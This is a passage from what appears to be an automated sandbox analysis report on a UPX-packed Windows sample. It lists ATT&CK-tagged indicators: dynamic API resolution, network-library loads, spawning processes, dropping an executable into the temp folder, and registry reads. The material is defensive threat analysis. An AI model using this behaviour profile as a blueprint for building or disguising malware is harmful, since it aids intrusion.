0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005640)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005476)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da59b676@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e4c6c@ADVAPI32.dll\"\n \"0e000f00703f4c6c@ADVAPI32.dll\"\n \"0e000f00cc3f4c6c@ADVAPI32.dll\"\n \"11001200b4474c6c@ADVAPI32.dll\"\n \"1100120048484c6c@ADVAPI32.dll\"\n \"120013008c484c6c@ADVAPI32.dll\"\n \"12001300e4484c6c@ADVAPI32.dll\"\n \"14001500386e4c6c@ADVAPI32.dll\"\n \"14001500506e4c6c@ADVAPI32.dll\"\n \"14001500686e4c6c@ADVAPI32.dll\"\n \"17001800806e4c6c@ADVAPI32.dll\"\n \"0d000e00986e4c6c@ADVAPI32.dll\"\n \"11001200a86e4c6c@ADVAPI32.dll\"\n \"11001200bc6e4c6c@ADVAPI32.dll\"\n \"0d000e0044664c6c@WININET.DLL\"\n \"0d000e00b4664c6c@WININET.DLL\"\n \"10001100ec664c6c@WININET.DLL\"\n \"1000110090674c6c@WININET.DLL\"\n \"10001100006f4c6c@WININET.DLL\"\n \"10001100146f4c6c@WININET.DLL\"\n \"14001500286f4c6c@WININET.DLL\"\n \"14001500406f4c6c@WININET.DLL\"\n \"12001300586f4c6c@WININET.DLL\"\n \"120013006c6f4c6c@WININET.DLL\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"CreateProcessW\" with parameter \":*C:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe *\" - (UID: 00000000-00005640)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZUTUTG\" - (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71340000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 765f0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c7f0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75790000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 76c10000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76f10000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75a70000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71080000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75b80000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76700000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005476)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005476)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an writable section named \"UPX0\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an writable section named \"UPX1\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an writable section named \".rsrc\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an writable section named \".imports\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \"UPX0\"\n \"085cda53603755dc.exe\" has an writable section named \"UPX1\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".imports\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an executable section named \"UPX0\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" has an executable section named \"UPX1\"\n \"085cda53603755dc.exe\" has an executable section named \"UPX0\"\n \"085cda53603755dc.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f6 ...\" (UID: 00000000-00005656)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUTUTG\" (UID: 00000000-00005476)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f6 ...\" (UID: 00000000-00005656)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUTUTG\" (UID: 00000000-00005476)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" was detected as \"MinGW\" and name: \"Compiler\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \"UPX0\" is \"0x115000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005656]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" reads file \"c:\\37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: 